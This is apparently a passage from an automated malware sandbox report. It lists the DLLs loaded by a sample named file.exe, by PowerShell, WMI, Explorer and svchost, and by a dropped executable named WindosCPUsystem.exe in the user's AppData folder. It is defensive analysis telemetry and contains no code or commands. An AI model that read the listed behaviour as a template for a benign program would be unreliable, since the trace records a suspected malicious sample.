Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
